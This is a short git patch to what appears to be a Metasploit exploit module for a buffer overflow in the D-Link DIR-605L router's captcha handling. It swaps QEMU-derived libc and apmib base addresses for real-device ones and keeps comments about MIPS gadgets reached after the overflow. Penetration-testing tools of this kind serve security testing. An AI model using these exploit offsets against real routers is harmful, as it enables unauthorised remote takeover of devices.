From a00a813649e2d3604c465dc528663f16610f7a39 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 17 Oct 2013 22:34:54 -0500 Subject: [PATCH] Add real device libraries base addresses --- modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 1c441c0b93..ca1b997239 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote [ 'DLink DIR-605L 1.13', { 'Offset' => 94, - 'LibcBase' => 0x4212e000, # QEMU environment - 'ApmibBase' => 0x42095000, # QEMU environment + 'LibcBase' => 0x2ab86000, # According to Original Exploit by Craig Heffner + 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner + #'LibcBase' => 0x4212e000, # QEMU environment + #'ApmibBase' => 0x42095000, # QEMU environment #LOAD:000248D4 li $a0, 1 ; set $a0 for the sleep() call #LOAD:000248D8 move $t9, $s1 ; $s1 is controlled after the overflow #LOAD:000248DC jalr $t9